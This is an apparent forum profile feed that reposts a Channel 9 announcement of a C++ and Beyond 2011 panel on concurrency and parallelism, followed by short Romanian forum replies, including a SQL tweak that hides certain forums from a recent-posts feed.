    [h=1]C&B 2011 Panel: Herb Sutter, Andrei Alexandrescu and Scott Meyers - Concurrency and Parallelism[/h] Posted: Nov 15, 2011 at 6:00 AM By: Charles I was able to attend C++ and Beyond 2011 and it was a tremendous experience. The technical depth and C++ goodness was profound and lasted for 3 whole days (and two evenings). Thanks Andrei Alexandrescu, Scott Meyers and Herb Sutter for allowing me to crash your affair with my camera - which was perhaps too big and too advanced for the likes of me - still, I was abe to capture some great content like this interactive panel on Concurrency and Parallelism with Scott, Andrei and Herb. Great questions from attendees. Note that this is the second in a series of three panels from C++ and Beyond 2011 that will appear on C9 over the coming months. Make sure to check out all the C&B 2011 content we're lucky enough to have stored on C9 Enjoy! Learn! Table of contents (click on the time code link to move the player to that point in time...): [00:00] Using multiple cores for useful work... [01:56] Does C++AMP build on PPL? [02:48] What about operating system scheduling for GPU operations? [03:49] Transition from platform-specific memory models to a standard(ized) C++ memory model (C++11's MM, to be specific...). [06:41] Is there a performance penalty associated with a standard C++ memory model? [09:18] What about functional languages/techniques (with respect to parallel and concurrent programming)? [15:44] Which performance pitfalls we may pitfall into? [16:13] What about the work on ranges and wouldn't they help parallelism? [20:34] Fortran arrays have things like slices and strides. What about C++AMP? [22:42] Parallel debugging... [23:30] How baked is C++AMP? [25:26] On SIMD and MIMD... [34:20] Computation-following-data versus data-following-computation... Download: http://ch9files.blob.core.windows.net/ch9/28f6/fc9b793f-cd7d-4280-b4cb-9f42016f28f6/CppBeyond11ConcurrencyPanel_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/28f6/fc9b793f-cd7d-4280-b4cb-9f42016f28f6/CppBeyond11ConcurrencyPanel_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/CB-2011-Panel-Herb-Sutter-Andrei-Alexandrescu-and-Scott-Meyers-Concurrency-and-Parallelism
  21. Nytro

    RST Market

    Nytro replied to a topic in Anunturi importante

    Spune exact ce/cum/unde sa fie.
  22. Nytro
    Exista carti, exista tutoriale, exista videoclipuri, se preda in licee/facultati, exista academii speciale pentru asa ceva, trebuie doar sa iti dai putin interesul.
  23. Nytro
    Incepatori... Sa incepem cu o intrebare: ce ai citit legat de programare?
  24. Nytro

    N.A.S.A hack

    Nytro replied to shadyRO's topic in Cosul de gunoi

    OMFG, asta e 0day, acum a aflat toata lumea...
  25. Nytro

    RST Market

    Nytro replied to a topic in Anunturi importante

    Pula mea, nu erau indexate, dar external.php ala scotea ultimele posturi din tabelul "post"... INNER JOIN " . TABLE_PREFIX . "forum AS forum ON(forum.forumid = thread.forumid) Am pus eu: INNER JOIN " . TABLE_PREFIX . "forum AS forum ON(forum.forumid = thread.forumid AND forum.forumid <> 10 AND forum.forumid <> 11) Daca e vreo problema, spuneti.
×
×
  • Create New...